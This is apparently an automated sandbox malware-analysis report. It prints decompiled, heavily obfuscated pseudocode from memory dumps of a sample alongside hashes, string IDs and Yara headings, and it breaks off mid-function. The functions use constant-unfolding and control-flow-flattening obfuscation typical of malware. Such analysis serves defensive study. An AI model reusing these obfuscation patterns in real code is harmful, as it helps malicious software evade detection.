                                          Similarity
                                          • API ID:
                                          • String ID: "$.ll:$.$?o$@l$@|$Qjcc$T$Ta$ $Ta$ $XD$^$m^$r$rW$,$3$q$~
                                          • API String ID: 0-3595463394
                                          • Opcode ID: ac3a594fd6a71efce64148898b3e65a045c7ec5b78a6f2517dc8c4d7c4d7bb49
                                          • Instruction ID: 7a4dbe226d5d7a5ad6d97b62f3626c7eda2fab01c2913b9022ee61fa8e533ab2
                                          • Opcode Fuzzy Hash: ac3a594fd6a71efce64148898b3e65a045c7ec5b78a6f2517dc8c4d7c4d7bb49
                                          • Instruction Fuzzy Hash: 007200715083818BE3B8CF25C54AB9BBBE2FBC4304F10891DE6D9962A0D7B58949CF53
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 98%
                                          			E006CD7EB() {
                                          				char _v520;
                                          				char _v1040;
                                          				signed int _v1044;
                                          				signed int _v1048;
                                          				signed int _v1052;
                                          				signed int _v1056;
                                          				signed int _v1060;
                                          				signed int _v1064;
                                          				signed int _v1068;
                                          				signed int _v1072;
                                          				signed int _v1076;
                                          				signed int _v1080;
                                          				signed int _v1084;
                                          				signed int _v1088;
                                          				signed int _v1092;
                                          				signed int _v1096;
                                          				signed int _v1100;
                                          				signed int _v1104;
                                          				signed int _v1108;
                                          				signed int _v1112;
                                          				signed int _v1116;
                                          				signed int _v1120;
                                          				signed int _v1124;
                                          				signed int _v1128;
                                          				signed int _v1132;
                                          				signed int _v1136;
                                          				signed int _v1140;
                                          				signed int _v1144;
                                          				signed int _v1148;
                                          				signed int _v1152;
                                          				signed int _v1156;
                                          				signed int _v1160;
                                          				signed int _v1164;
                                          				signed int _v1168;
                                          				signed int _v1172;
                                          				signed int _v1176;
                                          				signed int _v1180;
                                          				signed int _v1184;
                                          				signed int _v1188;
                                          				signed int _v1192;
                                          				signed int _v1196;
                                          				signed int _v1200;
                                          				signed int _v1204;
                                          				signed int _v1208;
                                          				signed int _v1212;
                                          				void* _t365;
                                          				intOrPtr _t367;
                                          				signed int _t379;
                                          				void* _t380;
                                          				void* _t399;
                                          				intOrPtr _t402;
                                          				signed int _t408;
                                          				intOrPtr _t409;
                                          				intOrPtr* _t410;
                                          				signed int _t411;
                                          				signed int _t412;
                                          				signed int _t413;
                                          				signed int _t414;
                                          				signed int _t416;
                                          				signed int* _t417;
                                          				void* _t419;
                                          
                                          				_t417 =  &_v1212;
                                          				_v1164 = 0xe848;
                                          				_v1164 = _v1164 << 0xc;
                                          				_t380 = 0xeb1d0fe;
                                          				_v1164 = _v1164 << 2;
                                          				_v1164 = _v1164 ^ 0x3a120029;
                                          				_v1196 = 0xb50a;
                                          				_v1196 = _v1196 * 0x54;
                                          				_v1196 = _v1196 << 1;
                                          				_v1196 = _v1196 << 0xc;
                                          				_v1196 = _v1196 ^ 0x6ce97179;
                                          				_v1072 = 0xa1a9;
                                          				_v1072 = _v1072 >> 6;
                                          				_v1072 = _v1072 ^ 0x00006740;
                                          				_v1112 = 0x5ab8;
                                          				_v1112 = _v1112 | 0xd40f1486;
                                          				_v1112 = _v1112 ^ 0xd40f3c8d;
                                          				_v1168 = 0x99b2;
                                          				_v1168 = _v1168 ^ 0x8e209920;
                                          				_v1168 = _v1168 + 0x17b0;
                                          				_v1168 = _v1168 + 0xffff252c;
                                          				_v1168 = _v1168 ^ 0x8e1f3ab7;
                                          				_v1108 = 0x6700;
                                          				_v1108 = _v1108 ^ 0xd74b138d;
                                          				_v1108 = _v1108 ^ 0xd74b4d2a;
                                          				_v1116 = 0xa6d3;
                                          				_v1116 = _v1116 << 0xc;
                                          				_v1116 = _v1116 ^ 0x0a6d47ef;
                                          				_v1144 = 0x46d4;
                                          				_v1144 = _v1144 | 0x60392883;
                                          				_t411 = 0x3e;
                                          				_v1052 = _v1052 & 0x00000000;
                                          				_v1144 = _v1144 / _t411;
                                          				_v1144 = _v1144 ^ 0x018d3ef5;
                                          				_v1212 = 0x195d;
                                          				_v1212 = _v1212 + 0x9a8f;
                                          				_v1212 = _v1212 >> 2;
                                          				_v1212 = _v1212 >> 0xf;
                                          				_v1212 = _v1212 ^ 0x00005610;
                                          				_v1092 = 0x8c48;
                                          				_v1092 = _v1092 | 0x14bcb660;
                                          				_v1092 = _v1092 ^ 0x14bcd719;
                                          				_v1184 = 0xdf30;
                                          				_v1184 = _v1184 | 0x71150163;
                                          				_v1184 = _v1184 + 0xffff3ca6;
                                          				_v1184 = _v1184 >> 5;
                                          				_v1184 = _v1184 ^ 0x03888299;
                                          				_v1100 = 0xf0a2;
                                          				_v1100 = _v1100 >> 2;
                                          				_v1100 = _v1100 ^ 0x00007018;
                                          				_v1076 = 0xde4e;
                                          				_v1076 = _v1076 * 0x25;
                                          				_v1076 = _v1076 ^ 0x0020254d;
                                          				_v1084 = 0x8f7c;
                                          				_v1084 = _v1084 + 0x3023;
                                          				_v1084 = _v1084 ^ 0x00008967;
                                          				_v1136 = 0x4c3;
                                          				_v1136 = _v1136 + 0xbbe6;
                                          				_v1136 = _v1136 | 0x03b94668;
                                          				_v1136 = _v1136 ^ 0x03b9f10c;
                                          				_v1120 = 0xdab0;
                                          				_v1120 = _v1120 << 2;
                                          				_v1120 = _v1120 ^ 0x0003158f;
                                          				_v1080 = 0xb6c1;
                                          				_v1080 = _v1080 ^ 0x2339c7b2;
                                          				_v1080 = _v1080 ^ 0x2339156d;
                                          				_v1152 = 0xaa63;
                                          				_v1152 = _v1152 | 0x7d17af71;
                                          				_v1152 = _v1152 << 0xc;
                                          				_v1152 = _v1152 ^ 0x7af75802;
                                          				_v1088 = 0x49a;
                                          				_v1088 = _v1088 >> 9;
                                          				_v1088 = _v1088 ^ 0x00004f36;
                                          				_v1192 = 0x2678;
                                          				_v1192 = _v1192 + 0xb679;
                                          				_v1192 = _v1192 << 0x10;
                                          				_v1192 = _v1192 + 0xffff3370;
                                          				_v1192 = _v1192 ^ 0xdcf068a3;
                                          				_v1064 = 0xeafb;
                                          				_v1064 = _v1064 << 1;
                                          				_v1064 = _v1064 ^ 0x00019538;
                                          				_v1096 = 0x88f8;
                                          				_t412 = 0x34;
                                          				_v1096 = _v1096 * 0x4f;
                                          				_v1096 = _v1096 ^ 0x002a1ade;
                                          				_v1132 = 0xf8dd;
                                          				_v1132 = _v1132 << 0xb;
                                          				_v1132 = _v1132 * 6;
                                          				_v1132 = _v1132 ^ 0x2ea92e25;
                                          				_v1148 = 0xb66c;
                                          				_v1148 = _v1148 * 0x79;
                                          				_v1148 = _v1148 * 0x37;
                                          				_v1148 = _v1148 ^ 0x12863225;
                                          				_v1044 = 0x2ced;
                                          				_v1044 = _v1044 | 0x6c1d274b;
                                          				_v1044 = _v1044 ^ 0x6c1d554c;
                                          				_v1104 = 0xd4fb;
                                          				_v1104 = _v1104 + 0xc222;
                                          				_v1104 = _v1104 ^ 0x0001c0a4;
                                          				_v1140 = 0xeff1;
                                          				_v1140 = _v1140 | 0x2c578e17;
                                          				_v1140 = _v1140 ^ 0x1f5808a8;
                                          				_v1140 = _v1140 ^ 0x330f90e2;
                                          				_v1156 = 0x54a4;
                                          				_v1156 = _v1156 ^ 0xe69aec3e;
                                          				_v1156 = _v1156 ^ 0x7a062859;
                                          				_v1156 = _v1156 ^ 0x9c9c8f10;
                                          				_v1180 = 0xa2be;
                                          				_v1180 = _v1180 / _t412;
                                          				_v1180 = _v1180 << 0xb;
                                          				_v1180 = _v1180 << 6;
                                          				_v1180 = _v1180 ^ 0x0642737d;
                                          				_v1204 = 0x65ae;
                                          				_v1204 = _v1204 + 0xb2b7;
                                          				_v1204 = _v1204 + 0xbb73;
                                          				_v1204 = _v1204 << 6;
                                          				_v1204 = _v1204 ^ 0x0074b164;
                                          				_v1176 = 0x3ecd;
                                          				_v1176 = _v1176 | 0x1d534930;
                                          				_v1176 = _v1176 << 0xa;
                                          				_v1176 = _v1176 ^ 0x842f9ee3;
                                          				_v1176 = _v1176 ^ 0xc9d04901;
                                          				_v1056 = 0xf360;
                                          				_v1056 = _v1056 | 0x93122b66;
                                          				_v1056 = _v1056 ^ 0x9312fd26;
                                          				_v1124 = 0x4a26;
                                          				_v1124 = _v1124 | 0x286a3d77;
                                          				_v1124 = _v1124 ^ 0x286a2522;
                                          				_v1060 = 0x57ed;
                                          				_v1060 = _v1060 + 0x784b;
                                          				_v1060 = _v1060 ^ 0x0000c3a5;
                                          				_v1068 = 0x69c7;
                                          				_v1068 = _v1068 << 5;
                                          				_v1068 = _v1068 ^ 0x000d6de9;
                                          				_v1208 = 0xffbd;
                                          				_v1208 = _v1208 * 0x3d;
                                          				_v1208 = _v1208 << 5;
                                          				_v1208 = _v1208 + 0x87f5;
                                          				_v1208 = _v1208 ^ 0x079ed184;
                                          				_v1128 = 0x5d27;
                                          				_v1128 = _v1128 >> 0xc;
                                          				_v1128 = _v1128 ^ 0x62edd6dc;
                                          				_v1128 = _v1128 ^ 0x62ed9c54;
                                          				_v1048 = 0x8776;
                                          				_t413 = 0x1e;
                                          				_t408 = _v1052;
                                          				_v1048 = _v1048 * 0xc;
                                          				_v1048 = _v1048 ^ 0x000959b7;
                                          				_v1172 = 0x35cb;
                                          				_t379 = _v1052;
                                          				_v1172 = _v1172 / _t413;
                                          				_v1172 = _v1172 | 0x92682d74;
                                          				_v1172 = _v1172 ^ 0x346a72ec;
                                          				_v1172 = _v1172 ^ 0xa6025f11;
                                          				_v1188 = 0x8f0f;
                                          				_t414 = 0x66;
                                          				_t416 = _v1052;
                                          				_v1188 = _v1188 / _t414;
                                          				_v1188 = _v1188 << 5;
                                          				_v1188 = _v1188 + 0x12e7;
                                          				_v1188 = _v1188 ^ 0x00003fc5;
                                          				_v1200 = 0x51b9;
                                          				_v1200 = _v1200 | 0x17a7f9cb;
                                          				_v1200 = _v1200 << 8;
                                          				_v1200 = _v1200 | 0xe40f2208;
                                          				_v1200 = _v1200 ^ 0xe7fffb08;
                                          				_v1160 = 0x57cd;
                                          				_v1160 = _v1160 + 0xffffc371;
                                          				_v1160 = _v1160 ^ 0x54a04296;
                                          				_v1160 = _v1160 ^ 0x54a059b8;
                                          				while(1) {
                                          					L1:
                                          					_t399 = 0x5c;
                                          					do {
                                          						while(1) {
                                          							L2:
                                          							_t419 = _t380 - 0x21daabfe;
                                          							if(_t419 > 0) {
                                          								break;
                                          							}
                                          							if(_t419 == 0) {
                                          								_t409 =  *0x6dca2c; // 0x248300
                                          								_t410 = _t409 + 0x230;
                                          								while(1) {
                                          									__eflags =  *_t410 - _t399;
                                          									if( *_t410 == _t399) {
                                          										break;
                                          									}
                                          									_t410 = _t410 + 2;
                                          									__eflags = _t410;
                                          								}
                                          								_t408 = _t410 + 2;
                                          								_t380 = 0x3af90ff3;
                                          								continue;
                                          							}
                                          							if(_t380 == 0x222340b) {
                                          								E006C5FB2(_v1208, _v1128, _t379);
                                          								L27:
                                          								return _v1052;
                                          							}
                                          							if(_t380 == 0x88778bb) {
                                          								_t416 = E006C54FE(_v1088, _v1160, _v1192, _v1064, _t380, _t380, _t408, _v1096, _v1200, _v1172, _v1132, _v1148, _v1044, _t380, _v1104, _t408,  &_v1040, _v1188, _t380, _t379, _v1140, _v1156, _t380, _v1180);
                                          								_t417 =  &(_t417[0x16]);
                                          								__eflags = _t416;
                                          								if(_t416 == 0) {
                                          									_t380 = 0x222340b;
                                          								} else {
                                          									_t380 = 0x212fea65;
                                          									_v1052 = 1;
                                          								}
                                          								while(1) {
                                          									L1:
                                          									_t399 = 0x5c;
                                          									goto L2;
                                          								}
                                          							}
                                          							if(_t380 == 0xeb1d0fe) {
                                          								_push(_t380);
                                          								_push(_t380);
                                          								E006CC6C7(_v1196, _v1072,  &_v520, _t380, _v1112, _v1164, _v1168);
                                          								_t417 =  &(_t417[7]);
                                          								_t380 = 0x3304c1c2;
                                          								while(1) {
                                          									L1:
                                          									_t399 = 0x5c;
                                          									goto L2;
                                          								}
                                          							}
                                          							if(_t380 != 0x212fea65) {
                                          								goto L24;
                                          							}
                                          							E006D42DA(_t416, _v1204, _v1176, _v1056, _t379, _v1124);
                                          							_t417 =  &(_t417[4]);
                                          							_t380 = 0x2e0be9f8;
                                          							while(1) {
                                          								L1:
                                          								_t399 = 0x5c;
                                          								goto L2;
                                          							}
                                          						}
                                          						__eflags = _t380 - 0x2e0be9f8;
                                          						if(_t380 == 0x2e0be9f8) {
                                          							E006C5FB2(_v1060, _v1068, _t416);
                                          							_t380 = 0x222340b;
                                          							_t399 = 0x5c;
                                          							goto L24;
                                          						}
                                          						__eflags = _t380 - 0x3304c1c2;
                                          						if(__eflags == 0) {
                                          							_push(_v1116);
                                          							_t365 = E006D889D(0x6dc930, _v1108, __eflags);
                                          							_t367 =  *0x6dca2c; // 0x248300
                                          							_t402 =  *0x6dca2c; // 0x248300
                                          							E006C29E3(_t402, 0x104, _t365, _v1144, _v1212, _v1092, _t367 + 0x230,  &_v1040, _v1184, _v1100);
                                          							E006D2025(_v1076, _t365, _v1084, _v1136);
                                          							_t417 =  &(_t417[0xc]);
                                          							_t380 = 0x21daabfe;
                                          							while(1) {
                                          								L1:
                                          								_t399 = 0x5c;
                                          								goto L2;
                                          							}
                                          						}
                                          						__eflags = _t380 - 0x3af90ff3;
                                          						if(_t380 != 0x3af90ff3) {
                                          							goto L24;
                                          						}
                                          						_t379 = E006C2959(_t380, _v1120, _v1080, _v1152, _v1048);
                                          						_t417 =  &(_t417[4]);
                                          						__eflags = _t379;
                                          						if(_t379 == 0) {
                                          							goto L27;
                                          						}
                                          						_t380 = 0x88778bb;
                                          						goto L1;
                                          						L24:
                                          						__eflags = _t380 - 0x27fd7905;
                                          					} while (_t380 != 0x27fd7905);
                                          					goto L27;
                                          				}
                                          			}


                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "%j($#0$']$)$6O$@g$H$Kx$M% $e/!$e/!$x&$yql$,$Gm$m$rj4
                                          • API String ID: 0-131801274
                                          • Opcode ID: 5368bce5bdd023042b4004dbb5e89f79af7c06a0a34f2076ad939c64e76617e7
                                          • Instruction ID: 19913671c0de2d1f24afec1b74352f0fb8f6b637f11aa77221109dfcca91d8fc
                                          • Opcode Fuzzy Hash: 5368bce5bdd023042b4004dbb5e89f79af7c06a0a34f2076ad939c64e76617e7
                                          • Instruction Fuzzy Hash: 3C02F371509380DFE3A9CF61C54AA5BFBE2FBC5708F10891DE19A862A0D7B58949CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E006CF98C(intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				char _v1;
                                          				char _v96;
                                          				char _v108;
                                          				char _v112;
                                          				char _v116;
                                          				intOrPtr _v120;
                                          				char _v124;
                                          				char _v128;
                                          				signed int _v132;
                                          				signed int _v136;
                                          				signed int _v140;
                                          				signed int _v144;
                                          				signed int _v148;
                                          				signed int _v152;
                                          				signed int _v156;
                                          				signed int _v160;
                                          				signed int _v164;
                                          				signed int _v168;
                                          				signed int _v172;
                                          				signed int _v176;
                                          				signed int _v180;
                                          				signed int _v184;
                                          				signed int _v188;
                                          				signed int _v192;
                                          				signed int _v196;
                                          				signed int _v200;
                                          				signed int _v204;
                                          				signed int _v208;
                                          				signed int _v212;
                                          				unsigned int _v216;
                                          				signed int _v220;
                                          				signed int _v224;
                                          				signed int _v228;
                                          				signed int _v232;
                                          				intOrPtr _v236;
                                          				signed int _v240;
                                          				signed int _v244;
                                          				signed int _v248;
                                          				signed int _v252;
                                          				signed int _v256;
                                          				signed int _v260;
                                          				signed int _v264;
                                          				intOrPtr _v268;
                                          				void* __ecx;
                                          				void* _t344;
                                          				void* _t374;
                                          				signed int _t377;
                                          				intOrPtr _t391;
                                          				void* _t392;
                                          				intOrPtr _t393;
                                          				signed int _t395;
                                          				intOrPtr _t396;
                                          				signed int _t397;
                                          				intOrPtr* _t401;
                                          				intOrPtr _t403;
                                          				intOrPtr* _t416;
                                          				char* _t448;
                                          				signed int _t450;
                                          				signed int _t451;
                                          				signed int _t452;
                                          				signed int _t453;
                                          				signed int _t454;
                                          				signed int _t455;
                                          				signed int _t456;
                                          				signed int _t457;
                                          				signed int _t458;
                                          				signed int _t459;
                                          				char* _t460;
                                          				void* _t461;
                                          				intOrPtr* _t468;
                                          				void* _t470;
                                          				void* _t472;
                                          
                                          				_t401 = _a4;
                                          				_push(_a16);
                                          				_t468 = __edx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_t401);
                                          				_push(__edx);
                                          				E006C602B(_t344);
                                          				_v180 = 0x2a54;
                                          				_t470 =  &_v268 + 0x18;
                                          				_v180 = _v180 ^ 0xdbb28899;
                                          				_t403 = 0;
                                          				_t461 = 0x405be48;
                                          				_v268 = 0;
                                          				_t450 = 0x55;
                                          				_v180 = _v180 * 0x34;
                                          				_v180 = _v180 ^ 0xa04911e4;
                                          				_v164 = 0x788;
                                          				_v164 = _v164 * 0x79;
                                          				_v164 = _v164 ^ 0x00038f4a;
                                          				_v260 = 0xdd03;
                                          				_v260 = _v260 ^ 0x82285f25;
                                          				_v260 = _v260 >> 7;
                                          				_v260 = _v260 << 4;
                                          				_v260 = _v260 ^ 0x104552fc;
                                          				_v132 = 0x81fa;
                                          				_v132 = _v132 | 0x4b6553e1;
                                          				_v132 = _v132 ^ 0x4b658f00;
                                          				_v208 = 0xbd69;
                                          				_t451 = 0x73;
                                          				_v208 = _v208 / _t450;
                                          				_v208 = _v208 + 0x56ba;
                                          				_v208 = _v208 ^ 0x000029ec;
                                          				_v156 = 0x625a;
                                          				_v156 = _v156 + 0xffff65b2;
                                          				_v156 = _v156 ^ 0xffffa807;
                                          				_v176 = 0xc378;
                                          				_v176 = _v176 >> 1;
                                          				_v176 = _v176 + 0x1919;
                                          				_v176 = _v176 ^ 0x00004408;
                                          				_v228 = 0xbfad;
                                          				_v228 = _v228 + 0xffff004b;
                                          				_v228 = _v228 / _t451;
                                          				_t452 = 0x16;
                                          				_v228 = _v228 / _t452;
                                          				_v228 = _v228 ^ 0x0019c242;
                                          				_v264 = 0x218a;
                                          				_v264 = _v264 | 0xaefe0d97;
                                          				_v264 = _v264 + 0x77f0;
                                          				_v264 = _v264 + 0xffffbecb;
                                          				_v264 = _v264 ^ 0xaefe1c0e;
                                          				_v152 = 0x1773;
                                          				_v152 = _v152 + 0x7c73;
                                          				_v152 = _v152 ^ 0x000090c4;
                                          				_v140 = 0xfcb3;
                                          				_v140 = _v140 + 0xffff1dd8;
                                          				_v140 = _v140 ^ 0x00004a86;
                                          				_v252 = 0x9e2f;
                                          				_t453 = 9;
                                          				_v252 = _v252 / _t453;
                                          				_v252 = _v252 << 0xc;
                                          				_v252 = _v252 + 0x6e7b;
                                          				_v252 = _v252 ^ 0x01198ad6;
                                          				_v136 = 0x978d;
                                          				_v136 = _v136 << 0xb;
                                          				_v136 = _v136 ^ 0x04bc6438;
                                          				_v144 = 0xf0b5;
                                          				_t454 = 0x79;
                                          				_v144 = _v144 * 0x51;
                                          				_v144 = _v144 ^ 0x004c2c51;
                                          				_v224 = 0xa482;
                                          				_v224 = _v224 ^ 0xc585cea3;
                                          				_v224 = _v224 / _t454;
                                          				_v224 = _v224 ^ 0x01a18743;
                                          				_v148 = 0xd0a0;
                                          				_v148 = _v148 >> 1;
                                          				_v148 = _v148 ^ 0x000025e7;
                                          				_v232 = 0xead1;
                                          				_v232 = _v232 ^ 0xc3cfbc77;
                                          				_v232 = _v232 | 0xf3c428cf;
                                          				_v232 = _v232 + 0xffff938a;
                                          				_v232 = _v232 ^ 0xf3cf35e7;
                                          				_v160 = 0xb488;
                                          				_v160 = _v160 + 0xf6e2;
                                          				_v160 = _v160 ^ 0x0001c37e;
                                          				_v212 = 0xc903;
                                          				_t455 = 0x1e;
                                          				_v212 = _v212 / _t455;
                                          				_v212 = _v212 ^ 0xfd3886ab;
                                          				_v212 = _v212 ^ 0xfd38fa88;
                                          				_v196 = 0xdd05;
                                          				_v196 = _v196 << 5;
                                          				_v196 = _v196 + 0xdc4b;
                                          				_v196 = _v196 ^ 0x001c7bd6;
                                          				_v200 = 0x4db0;
                                          				_v200 = _v200 ^ 0x1a7afaec;
                                          				_v200 = _v200 >> 8;
                                          				_v200 = _v200 ^ 0x001a5e83;
                                          				_v240 = 0x9d3f;
                                          				_v240 = _v240 >> 8;
                                          				_v240 = _v240 << 9;
                                          				_v240 = _v240 + 0x917a;
                                          				_v240 = _v240 ^ 0x0001a611;
                                          				_v256 = 0x4a86;
                                          				_v256 = _v256 >> 0xd;
                                          				_t456 = 0x55;
                                          				_v256 = _v256 * 0x35;
                                          				_v256 = _v256 + 0xffffab30;
                                          				_v256 = _v256 ^ 0xffffb251;
                                          				_v204 = 0x386;
                                          				_v204 = _v204 / _t456;
                                          				_v204 = _v204 ^ 0xc8309f8e;
                                          				_v204 = _v204 ^ 0xc830cb09;
                                          				_v172 = 0x8769;
                                          				_v172 = _v172 >> 0xe;
                                          				_v172 = _v172 ^ 0x00003b2d;
                                          				_v244 = 0x2b5b;
                                          				_v244 = _v244 + 0xb0ca;
                                          				_v244 = _v244 + 0xd805;
                                          				_v244 = _v244 << 2;
                                          				_v244 = _v244 ^ 0x0006bd06;
                                          				_v184 = 0x1527;
                                          				_v184 = _v184 | 0xeeea078d;
                                          				_t457 = 0x28;
                                          				_v184 = _v184 / _t457;
                                          				_v184 = _v184 ^ 0x05f92fca;
                                          				_v192 = 0x11fc;
                                          				_t458 = 0x16;
                                          				_v192 = _v192 / _t458;
                                          				_v192 = _v192 ^ 0x8895e54e;
                                          				_v192 = _v192 ^ 0x8895ebcd;
                                          				_v168 = 0xe011;
                                          				_v168 = _v168 + 0x4c50;
                                          				_v168 = _v168 ^ 0x0001058b;
                                          				_v216 = 0xf07;
                                          				_t459 = 0x32;
                                          				_v216 = _v216 * 0x36;
                                          				_v216 = _v216 >> 2;
                                          				_v216 = _v216 ^ 0x00008949;
                                          				_v248 = 0xde23;
                                          				_v248 = _v248 + 0xecd9;
                                          				_v248 = _v248 << 0xd;
                                          				_v248 = _v248 ^ 0x1d8b17f5;
                                          				_v248 = _v248 ^ 0x24d4a8d4;
                                          				_v220 = 0x3854;
                                          				_v220 = _v220 | 0x09b0f0f7;
                                          				_v220 = _v220 + 0xe63e;
                                          				_v220 = _v220 ^ 0x09b1b8f3;
                                          				_v188 = 0x295e;
                                          				_v188 = _v188 * 0x23;
                                          				_v188 = _v188 / _t459;
                                          				_v188 = _v188 ^ 0x00001cf4;
                                          				_t460 = _v124;
                                          				while(1) {
                                          					L1:
                                          					_t441 = _v236;
                                          					while(1) {
                                          						L2:
                                          						_t472 = _t461 - 0x299f8b6c;
                                          						if(_t472 <= 0) {
                                          							break;
                                          						}
                                          						if(_t461 == 0x2e2d51e6) {
                                          							_v124 = 0x14;
                                          							_t374 = E006CF39F(_v244, _v128, _t460 + 0x60,  &_v124, _v184, _v192, _v164, _t403, _v168);
                                          							_t403 = _v268;
                                          							_t470 = _t470 + 0x1c;
                                          							_t441 = _v236;
                                          							if(_t374 == 0) {
                                          								continue;
                                          							}
                                          							_t461 = 0x8f3e942;
                                          							_t403 = 1;
                                          							_v268 = 1;
                                          							L29:
                                          							if(_t461 == 0x33ec2607) {
                                          								L33:
                                          								return _v268;
                                          							}
                                          							while(1) {
                                          								L1:
                                          								_t441 = _v236;
                                          								goto L2;
                                          							}
                                          						}
                                          						if(_t461 == 0x2e332bc4) {
                                          							E006D2674(_v252, _v136, _a4, _t441, _v144, _v224,  *_t468);
                                          							_t470 = _t470 + 0x14;
                                          							_t461 = 0x2452d659;
                                          							L9:
                                          							_t403 = _v268;
                                          							goto L1;
                                          						}
                                          						if(_t461 == 0x2efa85f7) {
                                          							_t377 = _a4 + 1;
                                          							if((_t377 & 0x0000000f) != 0) {
                                          								_t377 = (_t377 & 0xfffffff0) + 0x10;
                                          							}
                                          							 *((intOrPtr*)(_t401 + 4)) = _t377 + 0x74;
                                          							_push(_t403);
                                          							_push(_t403);
                                          							_t460 = E006C8736( *((intOrPtr*)(_t401 + 4)));
                                          							 *_t401 = _t460;
                                          							if(_t460 == 0) {
                                          								goto L33;
                                          							} else {
                                          								_t317 = _t460 + 0x74; // 0x74
                                          								_t441 = _t317;
                                          								_v116 = _a4;
                                          								_t461 = 0x332cf2c2;
                                          								_t403 = _v268;
                                          								_v236 = _t317;
                                          								_v120 =  *((intOrPtr*)(_t401 + 4)) - 0x74;
                                          								continue;
                                          							}
                                          						}
                                          						if(_t461 != 0x332cf2c2) {
                                          							goto L29;
                                          						}
                                          						_t396 =  *0x6dca20; // 0x0
                                          						_t397 = E006D1B49( &_v128, _v264, _t403,  *((intOrPtr*)(_t396 + 0x2c)), _t403, _v152, _v140);
                                          						_t470 = _t470 + 0x14;
                                          						asm("sbb esi, esi");
                                          						_t461 = ( ~_t397 & 0x0493a058) + 0x299f8b6c;
                                          						goto L9;
                                          					}
                                          					if(_t472 == 0) {
                                          						if(_t403 == 0) {
                                          							E006CF536(_v156, _v176, _v228,  *_t401);
                                          						}
                                          						goto L33;
                                          					}
                                          					if(_t461 == 0x405be48) {
                                          						_t461 = 0x2efa85f7;
                                          						goto L2;
                                          					}
                                          					if(_t461 == 0x8f3e942) {
                                          						_push(_t403);
                                          						_push(_t403);
                                          						E006C5F43(_t403, _v128);
                                          						_t461 = 0x299f8b6c;
                                          						goto L9;
                                          					}
                                          					if(_t461 == 0x1e33600c) {
                                          						_v112 = 0x6c;
                                          						_t391 =  *0x6dca20; // 0x0
                                          						_t392 = E006C8010( &_v108,  &_v112, _v188, _v240,  *((intOrPtr*)(_t391 + 0x24)),  *((intOrPtr*)(_t391 + 0x10)), _v256, _v204, _v180, _v172);
                                          						_t470 = _t470 + 0x20;
                                          						if(_t392 == 0) {
                                          							_t461 = 0x8f3e942;
                                          							goto L9;
                                          						}
                                          						_t416 =  &_v1;
                                          						_t448 = _t460;
                                          						do {
                                          							 *_t448 =  *_t416;
                                          							_t448 = _t448 + 1;
                                          							_t416 = _t416 - 1;
                                          						} while (_t416 >=  &_v96);
                                          						_t461 = 0x2e2d51e6;
                                          						goto L9;
                                          					}
                                          					if(_t461 != 0x2452d659) {
                                          						goto L29;
                                          					}
                                          					_t393 =  *0x6dca20; // 0x0
                                          					_t395 = E006D0A3B(_v120, _v128, _v148, _v232, _v160, _t403,  &_v116, _v212, _v196, _t441, _v200, _t403,  *((intOrPtr*)(_t393 + 0x10)));
                                          					_t470 = _t470 + 0x2c;
                                          					asm("sbb esi, esi");
                                          					_t461 = ( ~_t395 & 0x153f76ca) + 0x8f3e942;
                                          					goto L9;
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: -;$>$K$PL$Q,L$Zb$[+$^)$l$s|${n$%$)$Q-.$Q-.$SeK
                                          • API String ID: 0-11970308
                                          • Opcode ID: e9b7fb1abc6f125693260c91bf994f9717df2631f1dcd2562bf35fd201769980
                                          • Instruction ID: df8323c28655483716540778b1e94a8d26cf62d0ad8b122a42bc0ff51cb8d402
                                          • Opcode Fuzzy Hash: e9b7fb1abc6f125693260c91bf994f9717df2631f1dcd2562bf35fd201769980
                                          • Instruction Fuzzy Hash: 981225725083809FE364CF25C889A9BFBF2FBC5314F148A1DF69986260D7B59949CF42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E006C1CFA(void* __edx, intOrPtr* _a4) {
                                          				intOrPtr _v4;
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				char _v16;
                                          				char _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				unsigned int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				signed int _v116;
                                          				signed int _v120;
                                          				signed int _v124;
                                          				signed int _v128;
                                          				signed int _v132;
                                          				signed int _v136;
                                          				signed int _v140;
                                          				unsigned int _v144;
                                          				signed int _v148;
                                          				signed int _v152;
                                          				signed int _v156;
                                          				signed int _v160;
                                          				signed int _v164;
                                          				signed int _v168;
                                          				signed int _v172;
                                          				signed int _v176;
                                          				signed int _v180;
                                          				signed int _v184;
                                          				signed int _v188;
                                          				signed int _v192;
                                          				signed int _v196;
                                          				signed int _v200;
                                          				signed int _v204;
                                          				signed int _v208;
                                          				signed int _v212;
                                          				signed int _v216;
                                          				signed int _v220;
                                          				signed int _v224;
                                          				signed int _v228;
                                          				void* __ecx;
                                          				void* _t496;
                                          				void* _t539;
                                          				intOrPtr _t544;
                                          				intOrPtr _t546;
                                          				signed int _t548;
                                          				signed int _t551;
                                          				intOrPtr _t552;
                                          				intOrPtr _t554;
                                          				signed int _t555;
